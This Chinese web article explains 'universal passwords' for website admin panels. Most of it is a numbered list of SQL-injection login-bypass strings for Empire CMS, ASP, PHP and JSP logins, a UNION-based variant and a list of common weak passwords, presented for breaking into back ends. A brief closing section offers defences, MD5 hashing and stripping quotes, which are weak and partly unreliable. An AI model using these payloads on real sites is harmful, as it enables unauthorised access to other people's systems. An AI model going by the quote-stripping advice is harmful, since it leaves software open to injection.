我们进入帝国CMS,一般都是通过输入用户名和密码进入,如果用户名和密码不正确,是不可能入得去的!
但后来出现了一些后台万能密码,所谓网站后台万能密码就是针对一种漏洞而言,在用户名与密码处都写入一系列字符,在不知道用户名和密码的情况下,通过一些语法语句,去非法入侵网站后台.使用万能密码时,如果知道管理员帐号的话直接添帐号,效果会更好!
例如我们要利用第一条就是:
用户名:"or "a"="a 密码:"or "a"="a 1:"or "a"="a 2: '.).or.('.a.'='.a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or.'a.'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or'
原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是因为提交字符未加过滤或过滤不严而导致的.
少数ASP网页后面登陆时可以用密码1'or'1'='1(用户名用admin等试)登陆成功。这一般也是SQL注入的第一课,原理涉及到SQL语句验证登陆时,如果密码=输入的密码,那么登陆成功,把1' or '1'='1带入即如果密码=1或者1=1那么登成功由于1=1恒成立,且密码=1与1=1是逻辑或的关系,则整句为TRUE,即登陆成功。
网站后台万能密码10大常用弱口令
01:"or "a"="a 02:')or('a'='a 03:or 1=1-- 04:'or 1=1-- 05:a'or' 1=1-- 06:"or 1=1-- 07:'or'a'='a 08:"or"="a'='a 09:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13:'OR 1=1 14:"or 1=1 15:'xor
16:
用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin) 密码 1
PHP万能密码
'or 1=1/*
jsp万能密码
1'or'1'='1
01:123456 02:12345 03:123456789 04:Password 05:iloveyou 06:princess 07:rockyou 08:1234567 09:12345678 10:abc123
万能密码有什么用?
所谓万能密码是针对一种漏洞而言,如果人家把你网站后台这个漏洞攻击了,那么你将会损失惨重,百度排名瞬间可以降为0。
如何抵御万能密码'or'='or'的攻击?
第一、对提交来的密码在进入SQL语句之前,先用MD5进行了转换,这样,就算在密码后加入了'or''=',也发挥不了作用。对于密码采用md5加密的,不妨在用户名处再加入一个or''='',也 就是在用户名处输入:jmdcw'or''=''or''=',这样的SQL 语句就是:
select username,userpass from user where username='jmdcw11'or''=''or''='' and userpass='12345678'
第二、就是在接收字符的语句中加入replace过滤语句,比如name就是:
name=replace(request("name"),"'","")
将'过滤为空。密码过滤的方法也类似。当然,这是简单的过滤方法,还有更多复杂的。比如过滤一些特殊字符,空格、chr(0)、%、script等一些字符,防止写入XSS代码。
巩固网站后台刻不容缓